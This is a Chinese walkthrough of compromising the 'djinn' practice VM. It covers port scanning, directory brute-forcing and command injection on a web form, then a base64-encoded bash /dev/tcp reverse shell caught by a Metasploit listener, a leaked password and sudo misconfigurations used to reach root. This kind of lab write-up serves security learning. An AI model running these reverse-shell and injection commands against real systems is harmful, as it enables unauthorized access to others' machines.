微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

djinn

靶机准备

将靶机ova文件导入虚拟机,并将网络设置为NAT

image


开机获得ip:192.168.164.188

image


kali:192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.188

image


开放了4个端口,其中7331运行着http服务,访问

image


爆下目录

./dirsearch.py -u http://192.168.164.188:7331 -e* -w top.txt

image


扫到两个目录
浏览器访问http://192.168.164.188:7331/wish,
发现命令注入点

image


无思路,以下参考wp:
攻击机上设置个监听

msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.164.137
set lport 4444
exploit

image


准备反弹shell命令

bash -i >& /dev/tcp/192.168.164.137/4444 0>&1

转成base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg==

页面输入框中提交

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg== | base64 -d | bash

image


转成交互式shell,查看不是root权限

python -c 'import pty; pty.spawn("/bin/bash")'

image


在/home/nitish/.dev下发现用户名密码文件

image


nitish:p4ssw0rdStr3r0n9
切换nitish用户

image


发现sam用户可以执行/usr/bin/genie,得到sam用户的shell,发现可以用root用户执行/root/lago

image


切换root,选择2,猜数字,然后输入num,成功拿到权限

image

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐